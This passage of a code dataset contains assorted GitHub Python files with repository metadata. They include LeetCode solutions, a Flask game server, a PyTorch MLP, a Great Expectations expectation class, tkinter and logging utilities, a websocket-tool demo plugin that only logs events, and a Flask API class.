self.ros_command(*command_to_be_sent)\n","repo_name":"ymohamedahmed/part1a","sub_path":"pre/marty/VENV/lib/python3.6/site-packages/martypy/marty.py","file_name":"marty.py","file_ext":"py","file_size_in_byte":23406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4485619143","text":"#212\n#pagno43\nclass TrieNode:\n def __init__(self):\n self.children = [None]*26\n self.endOfWord = False\n\n def insert(self, word):\n curr = self\n for c in word:\n idx = ord(c) - ord('a')\n if curr.children[idx] == None:\n curr.children[idx] = TrieNode()\n curr = curr.children[idx]\n curr.endOfWord = True\n \ndef findWords(board, words):\n if len(words) == 0: return []\n trie = TrieNode()\n for w in words:\n trie.insert(w)\n result = set()  # use a set so the result contains no duplicate words\n \n \n for i in range(len(board)):\n for j in range(len(board[0])):\n dfs(board,i, j, trie, \"\", result)\n result_v = list(result)\n return result_v\n\ndef dfs(board, i, j, trie, s, result):\n c = board[i][j]\n if c == '$': return\n board[i][j] = '$'\n t = trie.children[ord(c) - ord('a')]\n if(t != None):\n ss = s + c\n if t.endOfWord: result.add(ss)\n if i < len(board) - 1: dfs(board, i + 1, j, t, ss, result)\n if j < len(board[0])-1: dfs(board, i, j + 1, t, ss, result)\n if i > 0: dfs(board, i - 1, j, t, ss, result)\n if j > 0: dfs(board, i, j - 1, t, ss, result)\n board[i][j]=c \n\n \n \n \nr = input().split()\nb = r[2:]\nboard = [[ b[int(r[1])*i+j] for j in range(int(r[1])) ] for i in range(int(r[0]))]\n##print(board)\nwords = [\"oath\",\"pea\",\"eat\",\"rain\"]\nk = findWords(board, words)\nprint(*k)\n\n\n\n\n\n\n\n\n\n 
\n","repo_name":"nilankh/LeetCodeProblems","sub_path":"Backtracking/WordSearch2#212.py","file_name":"WordSearch2#212.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70190110546","text":"\"\"\"\r\nversion: python 3.8\r\nload_data.py defines the load function to load data from data/\r\n (only when the files have the correct name style)\r\n\r\nauthors:\r\n Dani van Enk, 11823526\r\n Michael Faber, 6087582\r\n\"\"\"\r\n\r\n# used imports\r\nimport csv\r\nfrom code.classes import Station, Connection\r\n\r\n\r\ndef load(stations_file, connections_file):\r\n \"\"\"\r\n loads data files into database\r\n\r\n parameters:\r\n stations_file - path to the stations file;\r\n connections_file - path to the connections file;\r\n\r\n returns stations dictionary and connection list\r\n \"\"\"\r\n\r\n # make sure stations file exists\r\n try:\r\n\r\n # get csv reader object from the datafile\r\n stations_reader = csv.reader(\r\n open(stations_file, \"r\", encoding=\"utf-8\"), delimiter=\",\")\r\n\r\n # skip header\r\n next(stations_reader)\r\n\r\n except FileNotFoundError:\r\n exit(f\"{stations_file} not found\")\r\n\r\n # make sure connections file exists\r\n try:\r\n\r\n # get csv reader object from the datafile\r\n connections_reader = csv.reader(\r\n open(connections_file, \"r\", encoding=\"utf-8\"), delimiter=\",\")\r\n\r\n # skip header\r\n next(connections_reader)\r\n\r\n except FileNotFoundError:\r\n exit(f\"{connections_file} not found\")\r\n\r\n # add stations and connections to database\r\n stations = {name: Station(name, lat, long)\r\n for name, lat, long in stations_reader}\r\n connections = [Connection(stations[start], stations[end], duration)\r\n for start, end, duration in connections_reader]\r\n\r\n return stations, connections\r\n","repo_name":"danivenk/UVA_Minor-Programming_Programming-Theory","sub_path":"code/data_loader/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17043771227","text":"import json\nimport time\nfrom threading import Thread\n\nfrom flask import Flask, request\nfrom flask_cors import CORS\n\nimport Config\nfrom GameObjects.Player import Player\nfrom PlayerManager import PlayerManager\nfrom Position import Position\nfrom Renderer import Renderer\nfrom WorldManager import WorldManager\n\napp = Flask(__name__)\nCORS(app)\n\nrenderer = Renderer()\nworld_manager = WorldManager()\nplayer_manager = PlayerManager()\n\nplayers = []\n\n\n@app.route('/get_worlds_info')\ndef get_worlds_info():\n answer = {\"status\": \"success\", \"message\": []}\n for cur_world in world_manager.worlds:\n answer.get(\"message\").append({\"id\": cur_world.world_id, \"name\": cur_world.world_name})\n return answer\n\n\n@app.route('/get_legend')\ndef get_legend():\n answer = {\"status\": \"success\", \"message\": world_manager.world_legend}\n return answer\n\n\n@app.route('/auth_player', methods=['POST'])\ndef spawn_player():\n request_data = json.loads(request.data)\n world_id = request_data.get(\"world_id\")\n world = world_manager.get_world_by_id(int(world_id))\n player_name = request_data.get(\"name\")\n password = request_data.get(\"password\")\n player_auth_result = player_manager.create_or_load_player(player_name, password, world)\n if player_auth_result.get(\"status\") == \"success\":\n player = player_auth_result.get(\"player\")\n return 
{\"status\": \"success\", \"message\": {\"player_id\": player.player_id}}\n else:\n error_message = player_auth_result.get(\"error\")\n return {\"status\": \"error\", \"message\": error_message}\n\n\n@app.route('/render_player')\ndef render_player():\n cur_player_id = request.args.get(\"id\")\n player = player_manager.get_player_by_id(int(cur_player_id))\n world = world_manager.get_world_by_id(int(0))\n result = renderer.render_for_player(player, world)\n return result\n\n\n@app.route('/move_player')\ndef move_player():\n cur_player_id = request.args.get(\"id\")\n move_side = request.args.get(\"move_side\")\n print(request.args)\n player = player_manager.get_player_by_id(int(cur_player_id))\n world = world_manager.get_world_by_id(int(0))\n result = player.move(world, move_side)\n return {\"status\": \"success\", \"message\": result}\n\n\ndef start():\n world_manager.generate_main_world(10, 10)\n app.run(debug=Config.DEBUG, host=Config.HOST, port=Config.PORT)\n\n\ndef auto_save():\n print(\"i'm alive\")\n time.sleep(30)\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"Zemllia/rpgram2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21964577396","text":"\"\"\"\r\nThis module implements a multi-layer perceptron (MLP) in PyTorch.\r\nYou should fill in code into indicated sections.\r\n\"\"\"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch import functional as F\r\n\r\nclass MLP(nn.Module):\r\n \"\"\"\r\n This class implements a Multi-layer Perceptron in PyTorch.\r\n It handles the different layers and parameters of the model.\r\n Once initialized an MLP object can perform forward.\r\n \"\"\"\r\n\r\n def __init__(self, n_inputs, n_hidden, n_classes):\r\n \"\"\"\r\n Initializes MLP object. \r\n \r\n Args:\r\n n_inputs: number of inputs.\r\n n_hidden: list of ints, specifies the number of units\r\n in each linear layer. If the list is empty, the MLP\r\n will not have any linear layers, and the model\r\n will simply perform a multinomial logistic regression.\r\n n_classes: number of classes of the classification problem.\r\n This number is required in order to specify the\r\n output dimensions of the MLP\r\n\r\n \"\"\"\r\n super(MLP, self).__init__()\r\n\r\n self.layers = nn.ModuleList()\r\n self.relu = nn.ReLU()\r\n\r\n for i in range(len(n_hidden)):\r\n if i == 0:\r\n layer = nn.Linear(n_inputs, n_hidden[i])\r\n else:\r\n layer = nn.Linear(n_hidden[i-1], n_hidden[i])\r\n\r\n torch.nn.init.xavier_uniform(layer.weight)\r\n layer.bias.data.fill_(0.01)\r\n #nn.init.normal_(layer.weight, mean = 0, std = 0.0001)\r\n self.layers.append(layer)\r\n\r\n if i < 3:\r\n self.layers.append(nn.ReLU(0.2))\r\n\r\n\r\n self.layers.append(nn.Linear(n_hidden[len(n_hidden) - 1], n_classes))\r\n torch.nn.init.xavier_uniform(layer.weight)\r\n layer.bias.data.fill_(0.01)\r\n self.layers.append(nn.Softmax(dim=1))\r\n\r\n print(self.layers)\r\n\r\n\r\n\r\n def forward(self, x):\r\n \"\"\"\r\n Performs forward pass of the input. 
Here an input tensor x is transformed through \r\n several layer transformations.\r\n \r\n Args:\r\n x: input to the network\r\n Returns:\r\n out: outputs of the network\r\n\r\n \"\"\"\r\n\r\n for layer in self.layers:\r\n x = layer(x)\r\n x = self.relu(x)\r\n\r\n return x\r\n","repo_name":"mhashas/dl-assignments","sub_path":"assignment_1/code/mlp_pytorch.py","file_name":"mlp_pytorch.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33151698286","text":"\ndef classification(word):\n num, string = '', ''\n\n for i in word:\n if i in '0123456789':\n num += i\n else:\n string += i\n return num, string\n\n\n\ndef process(word):\n num, string, answer = '', '', ''\n\n num, string = classification(word)\n \n if abs(len(num) - len(string)) >= 2:\n return ''\n\n elif len(num) - len(string) == 1:\n for i in range(len(string)):\n answer += num[i]\n answer += string[i]\n answer += num[-1]\n\n elif len(num) - len(string) == -1:\n for i in range(len(num)):\n answer += string[i]\n answer += num[i]\n answer += string[-1] \n\n else:\n for i in range(len(num)):\n answer += num[i]\n answer += string[i]\n\n return answer\n \nprint(process(\"12f3f4ss4fe\"))","repo_name":"HeoYou/algorithm-python","sub_path":"ex ct1.py","file_name":"ex ct1.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10793768816","text":"from typing import Dict, Optional\n\nimport altair as alt\nimport pandas as pd\n\nfrom great_expectations.core.expectation_configuration import ExpectationConfiguration\nfrom great_expectations.execution_engine import ExecutionEngine\nfrom great_expectations.expectations.expectation import (\n ColumnExpectation,\n InvalidExpectationConfigurationError,\n)\nfrom great_expectations.expectations.metrics.util import parse_value_set\nfrom great_expectations.expectations.util import (\n add_values_with_json_schema_from_list_in_params,\n render_evaluation_parameter_string,\n)\nfrom great_expectations.render.renderer.renderer import renderer\nfrom great_expectations.render.types import (\n RenderedGraphContent,\n RenderedStringTemplateContent,\n)\nfrom great_expectations.render.util import (\n parse_row_condition_string_pandas_engine,\n substitute_none_for_missing,\n)\n\n\nclass ExpectColumnDistinctValuesToBeInSet(ColumnExpectation):\n \"\"\"Expect the set of distinct column values to be contained by a given set.\n\n The success value for this expectation will match that of expect_column_values_to_be_in_set. However,\n expect_column_distinct_values_to_be_in_set is a \\\n :func:`column_aggregate_expectation \\\n `.\n\n For example:\n ::\n\n # my_df.my_col = [1,2,2,3,3,3]\n >>> my_df.expect_column_distinct_values_to_be_in_set(\n \"my_col\",\n [2, 3, 4]\n )\n {\n \"success\": false\n \"result\": {\n \"observed_value\": [1,2,3],\n \"details\": {\n \"value_counts\": [\n {\n \"value\": 1,\n \"count\": 1\n },\n {\n \"value\": 2,\n \"count\": 1\n },\n {\n \"value\": 3,\n \"count\": 1\n }\n ]\n }\n }\n }\n\n Args:\n column (str): \\\n The column name.\n value_set (set-like): \\\n A set of objects used for comparison.\n\n Keyword Args:\n parse_strings_as_datetimes (boolean or None) : If True values provided in value_set will be parsed \\\n as datetimes before making comparisons.\n\n Other Parameters:\n result_format (str or None): \\\n Which output mode to use: `BOOLEAN_ONLY`, `BASIC`, `COMPLETE`, or `SUMMARY`. 
\\\n For more detail, see :ref:`result_format `.\n include_config (boolean): \\\n If True, then include the expectation config as part of the result object. \\\n For more detail, see :ref:`include_config`.\n catch_exceptions (boolean or None): \\\n If True, then catch exceptions and include them as part of the result object. \\\n For more detail, see :ref:`catch_exceptions`.\n meta (dict or None): \\\n A JSON-serializable dictionary (nesting allowed) that will be included in the output without \\\n modification. For more detail, see :ref:`meta`.\n\n Returns:\n An ExpectationSuiteValidationResult\n\n Exact fields vary depending on the values passed to :ref:`result_format ` and\n :ref:`include_config`, :ref:`catch_exceptions`, and :ref:`meta`.\n\n See Also:\n :func:`expect_column_distinct_values_to_contain_set \\\n `\n\n \"\"\"\n\n # This dictionary contains metadata for display in the public gallery\n library_metadata = {\n \"maturity\": \"production\",\n \"tags\": [\"core expectation\", \"column aggregate expectation\"],\n \"contributors\": [\"@great_expectations\"],\n \"requirements\": [],\n \"has_full_test_suite\": True,\n \"manually_reviewed_code\": True,\n }\n\n # Setting necessary computation metric dependencies and defining kwargs, as well as assigning kwargs default values\\\n metric_dependencies = (\"column.value_counts\",)\n success_keys = (\n \"value_set\",\n \"parse_strings_as_datetimes\",\n )\n\n # Default values\n default_kwarg_values = {\n \"value_set\": None,\n \"parse_strings_as_datetimes\": False,\n \"result_format\": \"BASIC\",\n \"include_config\": True,\n \"catch_exceptions\": False,\n }\n args_keys = (\n \"column\",\n \"value_set\",\n )\n\n @classmethod\n def _atomic_prescriptive_template(\n cls,\n configuration=None,\n result=None,\n language=None,\n runtime_configuration=None,\n **kwargs,\n ):\n runtime_configuration = runtime_configuration or {}\n include_column_name = runtime_configuration.get(\"include_column_name\", True)\n include_column_name = (\n include_column_name if include_column_name is not None else True\n )\n styling = runtime_configuration.get(\"styling\")\n\n params = substitute_none_for_missing(\n configuration.kwargs,\n [\"column\", \"value_set\", \"row_condition\", \"condition_parser\"],\n )\n params_with_json_schema = {\n \"column\": {\"schema\": {\"type\": \"string\"}, \"value\": params.get(\"column\")},\n \"value_set\": {\n \"schema\": {\"type\": \"array\"},\n \"value\": params.get(\"value_set\"),\n },\n \"row_condition\": {\n \"schema\": {\"type\": \"string\"},\n \"value\": params.get(\"row_condition\"),\n },\n \"condition_parser\": {\n \"schema\": {\"type\": \"string\"},\n \"value\": params.get(\"condition_parser\"),\n },\n }\n\n if params[\"value_set\"] is None or len(params[\"value_set\"]) == 0:\n\n if include_column_name:\n template_str = \"$column distinct values must belong to this set: [ ]\"\n else:\n template_str = \"distinct values must belong to a set, but that set is not specified.\"\n\n else:\n\n for i, v in enumerate(params[\"value_set\"]):\n params[f\"v__{str(i)}\"] = v\n values_string = \" \".join(\n [f\"$v__{str(i)}\" for i, v in enumerate(params[\"value_set\"])]\n )\n\n if include_column_name:\n template_str = (\n f\"$column distinct values must belong to this set: {values_string}.\"\n )\n else:\n template_str = (\n f\"distinct values must belong to this set: {values_string}.\"\n )\n\n if params[\"row_condition\"] is not None:\n (\n conditional_template_str,\n conditional_params,\n ) = 
parse_row_condition_string_pandas_engine(\n params[\"row_condition\"], with_schema=True\n )\n template_str = f\"{conditional_template_str}, then {template_str}\"\n params_with_json_schema.update(conditional_params)\n\n params_with_json_schema = add_values_with_json_schema_from_list_in_params(\n params=params,\n params_with_json_schema=params_with_json_schema,\n param_key_with_list=\"value_set\",\n )\n\n return (template_str, params_with_json_schema, styling)\n\n @classmethod\n @renderer(renderer_type=\"renderer.prescriptive\")\n @render_evaluation_parameter_string\n def _prescriptive_renderer(\n cls,\n configuration=None,\n result=None,\n language=None,\n runtime_configuration=None,\n **kwargs,\n ):\n runtime_configuration = runtime_configuration or {}\n include_column_name = runtime_configuration.get(\"include_column_name\", True)\n include_column_name = (\n include_column_name if include_column_name is not None else True\n )\n styling = runtime_configuration.get(\"styling\")\n\n params = substitute_none_for_missing(\n configuration.kwargs,\n [\"column\", \"value_set\", \"row_condition\", \"condition_parser\"],\n )\n\n if params[\"value_set\"] is None or len(params[\"value_set\"]) == 0:\n\n if include_column_name:\n template_str = \"$column distinct values must belong to this set: [ ]\"\n else:\n template_str = \"distinct values must belong to a set, but that set is not specified.\"\n\n else:\n\n for i, v in enumerate(params[\"value_set\"]):\n params[f\"v__{str(i)}\"] = v\n values_string = \" \".join(\n [f\"$v__{str(i)}\" for i, v in enumerate(params[\"value_set\"])]\n )\n\n if include_column_name:\n template_str = (\n f\"$column distinct values must belong to this set: {values_string}.\"\n )\n else:\n template_str = (\n f\"distinct values must belong to this set: {values_string}.\"\n )\n\n if params[\"row_condition\"] is not None:\n (\n conditional_template_str,\n conditional_params,\n ) = parse_row_condition_string_pandas_engine(params[\"row_condition\"])\n template_str = f\"{conditional_template_str}, then {template_str}\"\n params.update(conditional_params)\n\n return [\n RenderedStringTemplateContent(\n **{\n \"content_block_type\": \"string_template\",\n \"string_template\": {\n \"template\": template_str,\n \"params\": params,\n \"styling\": styling,\n },\n }\n )\n ]\n\n @classmethod\n @renderer(renderer_type=\"renderer.descriptive.value_counts_bar_chart\")\n def _descriptive_value_counts_bar_chart_renderer(\n cls,\n configuration=None,\n result=None,\n language=None,\n runtime_configuration=None,\n **kwargs,\n ):\n assert result, \"Must pass in result.\"\n value_count_dicts = result.result[\"details\"][\"value_counts\"]\n if isinstance(value_count_dicts, pd.Series):\n values = value_count_dicts.index.tolist()\n counts = value_count_dicts.tolist()\n else:\n values = [\n value_count_dict[\"value\"] for value_count_dict in value_count_dicts\n ]\n counts = [\n value_count_dict[\"count\"] for value_count_dict in value_count_dicts\n ]\n\n df = pd.DataFrame(\n {\n \"value\": values,\n \"count\": counts,\n }\n )\n\n if len(values) > 60:\n return None\n else:\n chart_pixel_width = (len(values) / 60.0) * 500\n if chart_pixel_width < 250:\n chart_pixel_width = 250\n chart_container_col_width = round((len(values) / 60.0) * 6)\n if chart_container_col_width < 4:\n chart_container_col_width = 4\n elif chart_container_col_width >= 5:\n chart_container_col_width = 6\n elif chart_container_col_width >= 4:\n chart_container_col_width = 5\n\n mark_bar_args = {}\n if len(values) == 1:\n 
mark_bar_args[\"size\"] = 20\n\n bars = (\n alt.Chart(df)\n .mark_bar(**mark_bar_args)\n .encode(y=\"count:Q\", x=\"value:O\", tooltip=[\"value\", \"count\"])\n .properties(height=400, width=chart_pixel_width, autosize=\"fit\")\n )\n\n chart = bars.to_json()\n\n new_block = RenderedGraphContent(\n **{\n \"content_block_type\": \"graph\",\n \"header\": RenderedStringTemplateContent(\n **{\n \"content_block_type\": \"string_template\",\n \"string_template\": {\n \"template\": \"Value Counts\",\n \"tooltip\": {\n \"content\": \"expect_column_distinct_values_to_be_in_set\"\n },\n \"tag\": \"h6\",\n },\n }\n ),\n \"graph\": chart,\n \"styling\": {\n \"classes\": [f\"col-{str(chart_container_col_width)}\", \"mt-1\"],\n },\n }\n )\n\n return new_block\n\n def validate_configuration(\n self, configuration: Optional[ExpectationConfiguration]\n ) -> None:\n \"\"\"Validating that user has inputted a value set and that configuration has been initialized\"\"\"\n super().validate_configuration(configuration)\n\n try:\n assert \"value_set\" in configuration.kwargs, \"value_set is required\"\n assert (\n isinstance(configuration.kwargs[\"value_set\"], (list, set, dict))\n or configuration.kwargs[\"value_set\"] is None\n ), \"value_set must be a list, set, or None\"\n if isinstance(configuration.kwargs[\"value_set\"], dict):\n assert (\n \"$PARAMETER\" in configuration.kwargs[\"value_set\"]\n ), 'Evaluation Parameter dict for value_set kwarg must have \"$PARAMETER\" key'\n except AssertionError as e:\n raise InvalidExpectationConfigurationError(str(e))\n\n def _validate(\n self,\n configuration: ExpectationConfiguration,\n metrics: Dict,\n runtime_configuration: dict = None,\n execution_engine: ExecutionEngine = None,\n ):\n parse_strings_as_datetimes = self.get_success_kwargs(configuration).get(\n \"parse_strings_as_datetimes\"\n )\n observed_value_counts = metrics.get(\"column.value_counts\")\n observed_value_set = set(observed_value_counts.index)\n value_set = self.get_success_kwargs(configuration).get(\"value_set\") or []\n\n if parse_strings_as_datetimes:\n parsed_value_set = parse_value_set(value_set)\n else:\n parsed_value_set = value_set\n\n expected_value_set = set(parsed_value_set)\n\n if not expected_value_set:\n success = True\n else:\n success = observed_value_set.issubset(expected_value_set)\n\n return {\n \"success\": success,\n \"result\": {\n \"observed_value\": sorted(list(observed_value_set)),\n \"details\": {\"value_counts\": observed_value_counts},\n },\n }\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/great-expectations/venv/lib/python3.8/site-packages/great_expectations/expectations/core/expect_column_distinct_values_to_be_in_set.py","file_name":"expect_column_distinct_values_to_be_in_set.py","file_ext":"py","file_size_in_byte":15029,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"41220525451","text":"from tkinter import *\nfrom PIL import ImageTk, Image\nfrom setupPages.step4 import Step4\n\nclass Step3():\n def __init__(self, root, parent):\n self.parent = parent\n self.root = root\n self.backgroundPng = ImageTk.PhotoImage(Image.open(\"Assets/Setup_Page_Assets/Step3/background.png\"))\n self.backButtPng = ImageTk.PhotoImage(Image.open(\"Assets/Setup_Page_Assets/Step3/Button/back.png\"))\n self.createDataPng = ImageTk.PhotoImage(Image.open(\"Assets/Setup_Page_Assets/Step3/Button/create.png\"))\n self.font = \"Bahnschrift\"\n self.primaryColor = \"#ff793f\"\n\n def draw(self):\n self.step3_frame = 
Frame(self.root, bg=\"white\", width=1080, height=650)\n        self.step3_frame.place(x=0, y=0)\n\n        self.background = Label(self.step3_frame, bg=\"white\", bd=0, image=self.backgroundPng )\n        self.background.photo = self.backgroundPng\n        self.background.place(x=12, y=5)\n\n        self.heading = Label(self.step3_frame, fg=\"black\", text=\"Let's Setup Your\", bd=0, bg=\"white\", font=(self.font, 30, 'normal'))\n        self.heading.place(x=725, y=300)\n\n        self.heading1 = Label(self.step3_frame, fg=self.primaryColor, text=\"Database\", bd=0, bg=\"white\",\n                              font=(self.font, 30, 'normal'))\n        self.heading1.place(x=725, y=350)\n\n        def back():\n            self.destroy()\n\n        self.backButt = Button(self.step3_frame, bg=\"white\", activebackground=\"white\", bd=0,\n                               image=self.backButtPng, command=back)\n        self.backButt.photo = self.backButtPng\n        self.backButt.place(x=20, y=15)\n\n        def create():\n            Step4(root=self.root, parent=self.step3_frame).draw()\n\n        self.createData = Button(self.step3_frame, bg=\"white\", activebackground=\"white\", bd=0,\n                                 image=self.createDataPng, command=create)\n        self.createData.photo = self.createDataPng\n        self.createData.place(x=725, y=450)\n\n    def destroy(self):\n        self.step3_frame.destroy()\n\n","repo_name":"ManishJangid007/Attendence-Management-System","sub_path":"Admin/setupPages/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"22455142086","text":"from functools import wraps\nfrom logging import handlers\nfrom datetime import timedelta, datetime\nimport os\nimport time\nimport logging\n\n\nclass Logger(object):\n    level_relations = {\n        'debug': logging.DEBUG,\n        'info': logging.INFO,\n        'warning': logging.WARNING,\n        'error': logging.ERROR,\n        'crit': logging.CRITICAL\n    }\n\n    def __init__(self, filename, level='info', when='D', backCount=3):\n        log_path = os.path.dirname(filename)\n        if not os.path.exists(log_path):\n            os.mkdir(log_path)\n        fmt = '%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n        self.logger = logging.getLogger(filename)\n        format_str = logging.Formatter(fmt)  # set the log format\n        self.logger.setLevel(self.level_relations.get(level))  # set the log level\n        sh = logging.StreamHandler()  # output to the screen\n        sh.setFormatter(format_str)  # set the format shown on screen\n        th = handlers.TimedRotatingFileHandler(filename=filename, when=when, backupCount=backCount, encoding='utf-8')  # write to file; this handler rotates the file automatically at the given interval\n        # S  seconds\n        # M  minutes\n        # H  hours\n        # D  days\n        # W  every week (interval==0 means Monday)\n        # midnight  every day at midnight\n        th.setFormatter(format_str)  # set the format written to the file\n        self.logger.addHandler(sh)  # attach the handlers to the logger\n        self.logger.addHandler(th)\n\n\ndef clock_it(func):\n    @wraps(func)\n    def inner_func(*args, **kwargs):\n        print(\"EXECUTE FUNC: {}\".format(func.__name__))\n        print(\"START TIME: {}\".format(time.strftime(\"%Y-%m-%d-%H-%M-%S\")))\n        start_time = time.time()\n        result = func(*args, **kwargs)\n        print(\"END TIME: {}\".format(time.strftime(\"%Y-%m-%d-%H-%M-%S\")))\n        end_time = time.time()\n        print(\"EXECUTE TIME: {:.3f} s\".format((end_time-start_time)))\n        return result\n    return inner_func\n\n\ndef parse_pub_time(pub_time):\n    pub_time = pub_time.strip()\n    now = datetime.now()\n    if ':' in pub_time:\n        delta = timedelta(days=0)\n        n_days = now + delta\n        return n_days.strftime('%Y-%m-%d ') + pub_time[:-2]  # drop the trailing two characters ('发布', i.e. 'published')\n    elif '1天' in pub_time:\n        delta = timedelta(days=-1)\n        n_days = now + delta\n        return n_days.strftime('%Y-%m-%d')\n    elif '2天' in pub_time:\n        delta = timedelta(days=-2)\n        n_days = now + delta\n        return 
n_days.strftime('%Y-%m-%d')\n    elif '3天' in pub_time:\n        delta = timedelta(days=-3)\n        n_days = now + delta\n        return n_days.strftime('%Y-%m-%d')\n    elif '-' in pub_time:\n        return pub_time\n\n\ndef parse_job_addr(ls):\n    addr = ''\n    for i in ls:\n        addr = addr + i.strip()\n    return addr.strip('查看地图')\n\n\ndef list_isempty(ls):\n    \"\"\"\n    The result of an xpath rule may be empty; when it is not, return the first value, otherwise return an empty string.\n    :param ls:\n    :return:\n    \"\"\"\n    if ls:\n        return ls[0].strip()\n    else:\n        return ''\n","repo_name":"hkl778250693/musician","sub_path":"ManhuiPlanAutoFill/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"40822287230","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 5 22:11:38 2017\n\n@author: tzb\n\"\"\"\nimport numpy as np\n\n\"\"\"\nPurity is defined as follows:\n    Purity = (1/n)* sum(max(n_{ij}))\nwhere n_{ij} is the number of data points in the j-th cluster that belong to the i-th class.\nPurity measures the extent to which each cluster contains data points from primarily one class.\n\"\"\"\n\n\ndef get_purity(y, predy): # inputs: label_true, label_predict\n    \"\"\"\n    compute the purity of clustering\n    \n    Arguments:\n    y -- the true label of samples\n    predy -- the predicted label of samples\n    \n    Returns:\n    purity\n    \"\"\"\n\n    if len(y) != len(predy):\n        raise ValueError('y and predy have different lengths')\n    n = len(y)\n    y = get_classes(y)\n    predy = get_classes(predy)\n    total = 0\n    for key in predy:\n        pred_cluster = predy[key]\n        mx = 0\n        for key1 in y:\n            cluster = y[key1]\n            mx = max(mx, len(set(cluster).intersection(set(pred_cluster))))\n        total = total + mx\n\n    purity = 1.0 * total / n\n    return purity\n\n\ndef get_classes(y):\n    labels = np.unique(y)\n    result = {}\n    for label in labels:\n        result[label] = []\n        for i in range(len(y)):\n            if y[i] == label:\n                result[label].append(i)\n    return result\n\n\nif __name__ == '__main__':\n    y = np.array([1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 3, 1, 1, 3, 3, 3])\n    predy = np.array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3])\n    print(get_purity(y, predy))\n    y = [1, 2]\n    predy = [1, 1]\n    print(get_purity(y, predy))\n    print(get_purity(predy, y))\n","repo_name":"keneeth-tzb/AutoCodeBasedMethod","sub_path":"util/purity.py","file_name":"purity.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"20367656353","text":"import numpy as np\r\n\r\ndef read_ply(ply_file):\r\n    '''Gets an ASCII ply file and returns a dictionary with x,y,z,nx,ny,nz,red,green,blue, faces (the ones that are present\r\n    in the file). If some value is missing (eg. 
no normals) the dict will not have that value.'''\r\n properties=[]#List of property names\r\n with open(ply_file, 'r') as f:\r\n lines = f.readlines()\r\n j=0\r\n faces_num=0\r\n for line in lines:\r\n if line.startswith('element vertex'):\r\n verts_num = int(line.split(' ')[-1])\r\n elif line.startswith('element face'):\r\n faces_num = int(line.split(' ')[-1])\r\n elif line.startswith('property'):\r\n properties.append(line.split(' ')[-1].strip('\\n'))\r\n elif line.startswith('end_header'):\r\n start_line=j+1\r\n break\r\n j+=1\r\n \r\n ply_dict={} \r\n verts_lines = lines[start_line:start_line + verts_num]\r\n \r\n verts = np.array([list(map(float, l.strip().split(' '))) for l in verts_lines])\r\n if faces_num>0:\r\n faces_lines = lines[start_line + verts_num:]\r\n faces = np.array([list(map(int, l.strip().split(' '))) for l in faces_lines])[:,1:]\r\n ply_dict['faces'] = faces\r\n \r\n i=0\r\n while i None:\n \"\"\"Called when the websocket connection is established.\n\n In this demo, we're simply logging the successful connection event.\n \"\"\"\n self.log.info(\"Successfully connected to the server with the session token!\")\n\n async def on_message_received(self, message: WSMessage) -> None:\n \"\"\"Called when a (text) message is received from the server.\n\n In this demo, we're logging the original message received from the server.\n \"\"\"\n self.log.info(f\"Received message from server: {message.msg}\")\n # Further processing of the message can go here\n\n async def on_error(self, exception: Exception) -> None:\n \"\"\"Called when an error message is received from the server\n\n In this demo, we're logging the error.\n \"\"\"\n self.log.error(f\"An error occurred: {exception}\")\n # Additional error handling can go here\n","repo_name":"doyensec/wsrepl","sub_path":"docs/demo-2.py","file_name":"demo-2.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"48"} +{"seq_id":"38122274910","text":"#dynamic programming\ndef maxProduct(nums):\n # Initialize the variables\n maxProd = minProd = res = nums[0]\n\n # Iterate over the array starting from the second element\n for num in nums[1:]:\n # If the current number is negative, swapping the max and min product will be beneficial\n if num < 0:\n maxProd, minProd = minProd, maxProd\n\n # We either take the current number as the start of a new subarray, or include it in an existing subarray\n maxProd = max(num, maxProd * num)\n minProd = min(num, minProd * num)\n\n # Update the result with the maximum product\n res = max(res, maxProd)\n\n return res\n#time O(n)\n#space O(1)\n","repo_name":"0xspringtime/leetcode","sub_path":"0152n.py","file_name":"0152n.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8014576403","text":"from core.bases.api import APIBase\nfrom flask import request\nfrom todolist.board_column.requests import (\n CreateBoardColumn,\n DeleteBoardColumn,\n GetBoardColumn,\n UpdateBoardColumn,\n)\n\n\nclass BoardColumnListAPI(APIBase):\n def __init__(self, use_cases, *args, **kwargs):\n self.use_cases = use_cases\n super().__init__(*args, 